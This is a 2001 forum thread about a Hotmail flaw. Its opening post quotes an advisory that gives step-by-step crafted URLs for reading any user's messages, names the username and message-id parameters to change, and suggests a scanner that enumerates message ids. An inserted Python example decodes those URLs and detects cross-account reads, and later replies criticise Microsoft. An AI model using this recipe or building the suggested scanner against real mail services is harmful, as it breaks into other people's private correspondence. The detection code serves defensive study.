
Welcome to IWETHEY!

IMPORTANT -- Hotmail totally compromised
Below I include the full text of the original advisory. I recommend you and your organization(s) clear out your mailboxes and drop hotmail use completely until this issue is resolved. Hopefully by the time it is resolved, your org will have moved to a more reliable vendor. :)

###



Exploit lets you view e-mails from other people's accounts


---=[ Three Steps To View Someones Emails In Hotmail ]=---

(Tested with Internet Explorer 5)

To view full email from someone else's account, do the following:

1. Login normally to Hotmail with your ID (any id)

2. Use this type of link to view a specific message from a specific user:

[link|http://pv2fd.pav2.hotmail.msn.com/cgi-bin/saferd?_lang=EN|http://pv2fd.pav2.h...erd?_lang=EN]&hm___tg=http%3a%2f%2f64%2e4%2e36%2e250%2fcgi%2dbin%2fgetmsg&hm___qs=%26msg%3dMSG998047250%2e22%26start%3d9702%26len%3d9687%26raw%3d0%26disk%3d64%2e4%2e36%2e68_d1577%26login%3dusername%26domain%3dhotmail%2ecom&hm___fl=attrd&domain=hotmail.com
or
[link|http://lw14fd.law14.hotmail.msn.com/cgi-bin/saferd?_lang=EN|http://lw14fd.law14...erd?_lang=EN]&hm___tg=http%3a%2f%2f64%2e4%2e36%2e250%2fcgi%2dbin%2fgetmsg&hm___qs=%26msg%3dMSG998047250%2e22%26start%3d9702%26len%3d9687%26raw%3d0%26disk%3d64%2e4%2e36%2e68_d1577%26login%3dusername%26domain%3dhotmail%2ecom&hm___fl=attrd&domain=hotmail.com

From that link change these values:
MSG943322803%2e16 (Message id number, it's simply a counter. %2e=.)
username (Hotmail account name to view)

(remove "%26raw%3d0" if you want to view the email as 'emailbox view' instead of full raw view.)
(remove "&hm___fl=attrd&domain=hotmail.com" if you don't like the hotmail frame on top.)

3. Done. If you entered correct message number & that user has it you will see it. :)
(Test it with your own other hotmail account messages first to get the idea working.)


---=[ ideas and comments for improved viewing / scan ]---

Now, typing those message numbers manually is too much
work; you could create a small utility to automatically
scan a given range of messages from a specific user name.
(You need to build it to work with IE, as you must be
logged in to hotmail when you want to view messages.)

It also helps to know that from the message numbers
in your own hotmail inbox, you can see at about what time
each message number was used. e.g.:

MSG997936971.27 arrived on 16.08.2001.
MSG996698372.27 arrived on 01.08.2001.
MSG975960863.0 arrived on 04.12.2000.

So you don't need to scan as many message addresses
when you know which range you are looking at.

(Check out Hotmail Scanner Bot aka. hobo for automatic scanning.)

Test messages: (Log in to hotmail, then use the links to view a message from my test account)

raw format view: (can copy base64 encoded files too:)
[link|http://pv2fd.pav2.hotmail.msn.com/cgi-bin/saferd?_lang=EN|http://pv2fd.pav2.h...erd?_lang=EN]&hm___tg=http%3a%2f%2f64%2e4%2e36%2e250%2fcgi%2dbin%2fgetmsg&hm___qs=%26msg%3dMSG998047250%2e22%26start%3d1%26len%3d99999999999%26raw%3d0%26login%3djokutesti99%26domain%3dhotmail%2ecom

email box view: (can see any attached images directly etc.:)
[link|http://pv2fd.pav2.hotmail.msn.com/cgi-bin/saferd?_lang=EN|http://pv2fd.pav2.h...erd?_lang=EN]&hm___tg=http%3a%2f%2f64%2e4%2e36%2e250%2fcgi%2dbin%2fgetmsg&hm___qs=%26msg%3dMSG998047250%2e22%26start%3d1%26len%3d99999999999%26login%3djokutesti99%26domain%3dhotmail%2ecom

---=[............ Research by wAwAsAn4 ..............]=---
---=[........... wAwAsAn4@root-core.com .............]=---
---=[................. 17.08.2001 ...................]=---


www.root-core.com

==
[Digital-Vortex]
Webmaster
www.root-core.com

That's her, officer! That's the woman that programmed me for evil!
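The flaw quoted above is an authorization bypass: the getmsg endpoint behind saferd trusted the `login` and `msg` values nested in `hm___qs` instead of binding the mailbox to the authenticated session. The following is an added example, not code from the thread or from Hotmail, that decodes that nested URL format, applies the ownership check the service lacked, and flags cross-account reads and sequential message-id enumeration in constructed access-log lines (session names, the log layout and the message ids are invented samples; the hostnames and parameter names are the ones shown in the advisory).

```python
# Added example (not from the thread): decode the double-encoded saferd URL
# from the advisory, apply a session-ownership check, and scan constructed
# access-log lines for cross-account reads and message-id enumeration.
from collections import defaultdict
from urllib.parse import parse_qs, urlsplit

SAFERD = "http://pv2fd.pav2.hotmail.msn.com/cgi-bin/saferd?_lang=EN"
TG = "&hm___tg=http%3a%2f%2f64%2e4%2e36%2e250%2fcgi%2dbin%2fgetmsg"

def inner_params(url):
    """Return the getmsg parameters nested (percent-encoded once more) in hm___qs."""
    outer = parse_qs(urlsplit(url).query)
    nested = outer.get("hm___qs", [""])[0]        # parse_qs already turned %26 into &
    return {k: v[0] for k, v in parse_qs(nested.lstrip("&")).items()}

def authorize(session_login, url):
    """Hardened rule: a session may read only the mailbox it is bound to."""
    p = inner_params(url)
    return p.get("login") == session_login and p.get("domain") == "hotmail.com"

def sample_qs(msg, login, raw):
    """Build the hm___qs part of a constructed log entry in the advisory's format."""
    return ("&hm___qs=%26msg%3d" + msg.replace(".", "%2e") + "%26start%3d1%26len%3d100"
            + ("%26raw%3d0" if raw else "") + "%26login%3d" + login + "%26domain%3dhotmail%2ecom")

# Constructed access log: "<session login> <requested url>"; session 'alice'
# reads her own message, then three consecutive ids from 'bob'.
LOG = [
    "alice " + SAFERD + TG + sample_qs("MSG998047250.22", "alice", True),
    "alice " + SAFERD + TG + sample_qs("MSG998047250.23", "bob", False),
    "alice " + SAFERD + TG + sample_qs("MSG998047250.24", "bob", True),
    "alice " + SAFERD + TG + sample_qs("MSG998047250.25", "bob", True),
]

def scan(log, enum_threshold=3):
    """Flag requests for other users' mailboxes and bulk id enumeration per target."""
    findings, seen = [], defaultdict(set)
    for line in log:
        sess, url = line.split(" ", 1)
        p = inner_params(url)
        if not authorize(sess, url):
            findings.append(("cross-account", sess, p["login"], p["msg"]))
        seen[(sess, p["login"])].add(p["msg"])
    for (sess, login), ids in seen.items():
        if len(ids) >= enum_threshold:
            findings.append(("enumeration", sess, login, len(ids)))
    return findings

if __name__ == "__main__":
    for f in scan(LOG):
        print(f)
```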
"Trust your data to us"
.NET

:-P
Regards,

-scott anderson
Yeah, yeah, yeah - but . . .
. . [link|http://www.aaxnet.com/news/S010819.html|my article] includes the [link|http://www.geekculture.com/joyoftech/joyarchives/034.html|IMPORTANT] reason not to use Hotmail.
[link|http://www.aaxnet.com|AAx]
The spin...
...is rather obvious: Pay your money and get Exchange.

Probably why they bought hotmail - so they could screw it up and prevent it being a competitor to their server software. :-)
You be so __________________baaad
Hey! I was trying to keep my Diet Coke in the *intake* port!
Now it's all out my nose...

:D
Interesting article about Hotmail and Microsoft
Here is an interesting article about Hotmail, .NET, and Microsoft. [link|http://www.salon.com/tech/feature/2001/08/21/hotmail/index.html|http://www.salon.co...l/index.html]
Here is an interesting quote:
"And instead of hurting Microsoft, Ozzie argues, Hotmail's outages, security problems and minor troubles may actually improve the company's chances of making .NET work. Solutions can be applied to more ambitious plans, "increas[ing] the probability that they'll be able to manage the more strategically important services such as HailStorm when they indeed need to roll them out," he says.
...
And even if the Hotmail development process can be regarded as a training-wheels approach to .NET, that still may not be enough to ensure success, say critics.
"Is sitting in a wading pool good training for the Olympic high dive?" asks Miller. "You might learn some basics like, 'Don't breathe when your head is underwater,' but you're never going to pick up the technique until you buckle down and do it right."
The PHB-OS
It won't be easy. Microsoft has continually "sacrificed security for default features," ....... "The needs of a commercial software enterprise such as Microsoft" -- the need to create new products that bring in revenue -- "are fundamentally at odds with the growing need for software stability,... Stability, rather than revenue growth, is often the primary goal of the programmers who are constantly improving [open source servers].

This seems to be the common theme: MS markets to PHB's, and not techies. The techies get the headaches, and the PHB's love instant icons and "seamless" services. "Seamless" as in no barriers to hackers.

That is why MS does NOT sink: the PHB's are more enthralled with the gizmos than they are upset with techie complaints. MS just makes the techies look like complainers. "Come on, now, MS can't be that bad because everybody else is using it. Perhaps you just need to reboot it more, guys."

MS has decided to pick making the PHB's happy, and F the techies. The PHB's sign the checks to MS, not the techies. If a hacker breaks in, MS sends a letter to the PHB telling them that the techies forgot to install the patch in time.

I predict a new title:

Certified Patch Integration Technician.

AND, then MS gets profits from this new certification.

They win either way.


________________
oop.ismad.com
     IMPORTANT -- Hotmail totally compromised - (tseliot) - (7)
         "Trust your data to us" - (admin)
         Yeah, yeah, yeah - but . . . - (Andrew Grygus) - (3)
             The spin... - (ChrisR)
             You be so __________________baaad -NT - (Ashton)
             Hey! I was trying to keep my Diet Coke in the *intake* port! - (tseliot)
         Interesting article about Hotmail and Microsoft - (bluke) - (1)
             The PHB-OS - (tablizer)
